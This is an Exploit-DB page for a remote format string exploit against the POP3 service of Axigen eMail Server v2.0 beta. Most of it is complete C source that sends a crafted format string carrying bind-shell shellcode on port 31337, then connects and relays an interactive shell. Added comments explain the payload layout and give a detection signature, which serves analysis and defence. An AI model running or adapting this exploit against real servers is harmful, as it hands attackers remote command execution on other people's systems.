vendor:
Axigen eMail Server
by:
fuGich
7.5
CVSS
HIGH
Format String Vulnerability
134
CWE
Product Name: Axigen eMail Server
Affected Version From: Axigen eMail Server v2.0 (beta)
Affected Version To: Axigen eMail Server v2.0 (beta)
Patch Exists: NO
Related CVE: CVE not provided
CPE: a:axigen:axigen_email_server:2.0
Other Scripts:
Platforms Tested:
2006

Remote Shell Format String Vulnerability in Axigen eMail Server v2.0 (beta)

This exploit takes advantage of a format string vulnerability in the pop3 service of Axigen eMail Server v2.0 (beta) to execute /bin/sh and bind it to TCP port 31337. The format string was generated with libforSC and optimised to use %hhn for the writes. It only works when the logType for the pop3 service is set to "system" and the logLevel has its 4th bit set.

Mitigation:

Update to a patched version of Axigen eMail Server. The page lists no patch; until one is available, note that the published exploit depends on the pop3 service being configured with logType "system" and a logLevel whose 4th bit is set, so that logging configuration should be reviewed.
Source

Exploit-DB raw data:

/* axiagen.c
 *
 * Axigen eMail Server v2.0 (beta)
 * 	by fuGich Tue Dec 5 2006
 *
 * 		thanks to mu-b
 *
 * - Tested on: Axigen V2 (beta)
 *
 *   logType for the pop3 service must be "system" and 
 *   the logLevel set to any number with 4th bit set
 *
 * remote shell format string vulnerability in pop3
 * 	/bin/sh to bind to port 31337
 *
 * optimised format string generated with libforSC
 * used hhn for writes, could have been hn's but this was small enough and reduces size of log entry generated
 * 
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>


/* TCP port of the target's POP3 service; the payload is sent here. */
#define DEF_PORT    110
#define PORT_POP3   DEF_PORT


/*
 * Payload sent verbatim as the first POP3 command line (see formatme()).
 *
 * Layout, in order: a short code stub, a fork()ing bind shell that listens
 * on TCP port 31337, nine 4-byte target addresses, and finally the
 * printf-style conversion directives ("%u" padding plus "%n"/"%hhn" writes)
 * that drive the format-string bug, terminated by "\r\n".
 *
 * The absolute addresses (0x0985bed8, 0x804f09a) are fixed for the single
 * build named in the file header; nothing is computed at runtime, so the
 * payload is specific to that build.
 *
 * Detection note: a POP3 command containing "%...$hhn"/"%n" directives and
 * non-printable bytes is not valid protocol syntax and is a usable signature
 * for network or log monitoring.
 */
char formatString[] =
	
	// plt fixup code

	"\xba\xd8\xbe\x85\x09"		// mov    $0x985bed8,%edx
	"\xc7\x02\x9a\xf0\x04\x08"	// movl   $0x804f09a,(%edx)
	"\x8d\x52\x04"			// lea    0x4(%edx),%edx
	"\xc6\x02\xaa"			// movb   $0xaa,(%edx)
	"\x90\x90\x90"			// make divisible by 8
	
	//
	// bind shell with fork to port 31337 98 bytes
	//

	"\x6a\x66"              // push $0x66 
	"\x58"                  // pop %eax 
	"\x99"                  // cltd 
	"\x6a\x01"              // push $0x1 
	"\x5b"                  // pop %ebx 
	"\x52"                  // push %edx 
	"\x53"                  // push %ebx 
	"\x6a\x02"              // push $0x2 

	//
	// <_doint>:
	//

	"\x89\xe1"              // mov %esp,%ecx 
	"\xcd\x80"              // int $0x80 

	"\x5b"                  // pop %ebx 
	"\x5d"                  // pop %ebp 
	"\x52"                  // push %edx 
	"\x66\xbd\x69\x7a"      // mov $0x7a69,%bp (0x7a69 = 31337)
	"\x0f\xcd"              // bswap %ebp 
	"\x09\xdd"              // or %ebx,%ebp 
	"\x55"                  // push %ebp 
	"\x6a\x10"              // push $0x10 
	"\x51"                  // push %ecx 
	"\x50"                  // push %eax 
	"\x89\xe1"              // mov %esp,%ecx 
	"\xb0\x66"              // mov $0x66,%al 
	"\xcd\x80"              // int $0x80 
	"\xb3\x04"              // mov $0x4,%bl 
	"\xb0\x66"              // mov $0x66,%al 
	"\xcd\x80"              // int $0x80 

	//
	// <_acceptloop>:
	//

	"\x5f"                  // pop %edi 
	"\x50"                  // push %eax 
	"\x50"                  // push %eax 
	"\x57"                  // push %edi 
	"\x89\xe1"              // mov %esp,%ecx 
	"\x43"                  // inc %ebx 
	"\xb0\x66"              // mov $0x66,%al 
	"\xcd\x80"              // int $0x80 
	"\x93"                  // xchg %eax,%ebx 
	"\xb0\x02"              // mov $0x2,%al 
	"\xcd\x80"              // int $0x80 
	"\x85\xc0"              // test %eax,%eax 
	"\x75\x1a"              // jne <_parent> 
	"\x59"                  // pop %ecx 

	//
	// <_dup2loop>:
	//

	"\xb0\x3f"              // mov $0x3f,%al 
	"\xcd\x80"              // int $0x80 
	"\x49"                  // dec %ecx 
	"\x79\xf9"              // jns <_dup2loop> 

	"\xb0\x0b"              // mov $0xb,%al 
	"\x68\x2f\x2f\x73\x68"  // push $0x68732f2f 
	"\x68\x2f\x62\x69\x6e"  // push $0x6e69622f 
	"\x89\xe3"              // mov %esp,%ebx 
	"\x52"                  // push %edx 
	"\x53"                  // push %ebx 
	"\xeb\xb2"              // jmp <_doint> 

	//
	// <_parent>:
	//

	"\x6a\x06"              // push $0x6 
	"\x58"                  // pop %eax 
	"\xcd\x80"              // int $0x80 
	"\xb3\x04"              // mov $0x4,%bl 
	"\xeb\xc9"              // jmp <_acceptloop>

	//
	// 9 write addresses
	//

	"\xd8\xbe\x85\x09"	// pointer @ 0x0985bed8
	"\xd9\xbe\x85\x09"
	"\xda\xbe\x85\x09"
	"\xdb\xbe\x85\x09"
	"\xe0\xbe\x85\x09"	// place shell code @ 0x0985bee0
	"\xe1\xbe\x85\x09"
	"\xe2\xbe\x85\x09"
	"\xe3\xbe\x85\x09"
	"\xe4\xbe\x85\x09"

	// add the format string

	"%18u%66$n%34u%65$hhn%31u%72$hhn%10u%68$hhn%31u%71$hhn%87u%70$hhn%14u%69$hhn%90u%73$hhn%158u%67$hhn\r\n";


/* Forward declarations; shell() is the only non-static function besides main(). */
static int sock_send (int sock, u_char * src, int len);
static void formatme (u_char * host);
static int sockami (u_char * host, int port);
void shell (int sock);

/*
 * Interactive relay between the local terminal and the connected shell.
 *
 * Copies bytes from stdin (fd 0) to `sock` and from `sock` to stdout (fd 1)
 * until one side closes or a read fails, then exits the process. Never
 * returns normally.
 *
 * NOTE(review): `rfds` is never cleared with FD_ZERO(); FD_SET() is applied
 * to an uninitialised fd_set, so select() may see stray bits. The return
 * values of select() and of both write() calls are not checked.
 */
void shell (int sock){		/* Attach to Remote Shell */

	int     l;
	char    buf[512];
	fd_set  rfds;		/* uninitialised: see NOTE(review) above */

	while (1) {
		FD_SET (0, &rfds);
		FD_SET (sock, &rfds);
		select (sock + 1, &rfds, NULL, NULL, NULL);	/* result unchecked */
		if (FD_ISSET (0, &rfds)) {
			l = read (0, buf, sizeof (buf));
			if (l <= 0) {
				printf("\n - Connection closed by local user\n");
				exit (EXIT_FAILURE);
			}
			write (sock, buf, l);	/* short write / error not handled */
		}
		if (FD_ISSET (sock, &rfds)) {
			l = read (sock, buf, sizeof (buf));
			if (l == 0) {
				printf ("\n - Connection closed by remote host.\n");
				exit (EXIT_FAILURE);
			} else if (l < 0) {
				printf ("\n - Read failure\n");
				exit (EXIT_FAILURE);
			}
			write (1, buf, l);	/* short write / error not handled */
		}
	}
}

/*
 * Send `len` bytes from `src` on `sock` with a single send() call.
 *
 * Returns whatever send() returns (bytes sent, or -1). A short send is not
 * retried, and the only caller (formatme) ignores the result.
 */
static int sock_send (int sock, u_char * src, int len){		/* send data to the open socket */

	int sbytes;
	sbytes = send (sock, src, len, 0);
	return (sbytes);
}

/*
 * Resolve `host`, open a TCP socket and connect it to `port`.
 *
 * Returns the connected descriptor. Any failure is reported with perror()
 * and terminates the process; the exit codes are inconsistent (exit(-1)
 * after socket()/gethostbyname(), EXIT_FAILURE after connect()).
 *
 * NOTE(review): gethostbyname() is obsolete (not re-entrant, IPv4-oriented);
 * the memcpy() relies on hp->h_length fitting sin_addr, which holds for
 * AF_INET results. `host` is u_char* but gethostbyname() takes const char*,
 * so this compiles with a pointer-sign warning.
 */
static int sockami (u_char * host, int port){	/* create the socket */

	struct sockaddr_in address;
	struct hostent *hp;
	int sock;

	fflush (stdout);	/* push out the caller's "+Connecting ..." line (no newline) */
	if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1){
		perror ("socket()");
		exit (-1);
	}

	if ((hp = gethostbyname (host)) == NULL){
		perror ("gethostbyname()");
		exit (-1);
	}

	memset (&address, 0, sizeof (address));
	memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
	address.sin_family = AF_INET;
	address.sin_port = htons (port);

	if (connect (sock, (struct sockaddr *) &address, sizeof (address)) == -1){
		perror ("connect()");
		exit (EXIT_FAILURE);
	}
	return (sock);
}

/*
 * Deliver the payload and attach to the resulting shell.
 *
 * Connects to `host` on PORT_POP3, writes formatString as the first POP3
 * command, waits a fixed two seconds, then connects to TCP port 31337 (where
 * the payload's shellcode listens) and hands that socket to shell(). Does
 * not return normally, because shell() exits the process.
 *
 * NOTE(review): the return value of sock_send() is ignored, the first socket
 * is never closed, and sleep(2) is a fixed delay rather than a readiness
 * check. formatString is char[] passed where u_char* is expected
 * (pointer-sign warning).
 */
static void formatme (u_char * host){	/* do the evil */

	int sock;
	printf ("+Connecting to %s:%d ", host, PORT_POP3);	
	sock = sockami (host, PORT_POP3);
	printf ("\n+Sending format string\n");
	sock_send (sock, formatString, strlen (formatString));	/* result ignored */
	fflush (stdout);
	sleep(2);	/* fixed wait for the listener; not a readiness check */
	printf ("+Connecting to Shell ");	
	sock = sockami (host, 31337);	/* previous descriptor is leaked */
	printf ("- Done\n");
	shell(sock);

}

/*
 * Entry point: print the banner, require one argument (the target host) and
 * hand it to formatme().
 *
 * NOTE(review): the usage message is an error path but exits with
 * EXIT_SUCCESS, unlike the EXIT_FAILURE used elsewhere. There is no explicit
 * return; C99 treats reaching the end of main() as returning 0, which is moot
 * here since formatme() does not return. argv[1] is char* passed to a
 * u_char* parameter (pointer-sign warning).
 */
int main (int argc, char **argv){	/* go figure */

	printf ("Axigen 2.0 beta Remote pop3 exploit\n"
		"by: <fuGich@gmail.com>\n\n");

	if (argc <= 1)
	{
		fprintf (stderr, "Usage: %s <host>\n\n", argv[0]);
		exit (EXIT_SUCCESS);
	}

	formatme (argv[1]);
}

// milw0rm.com [2007-02-18]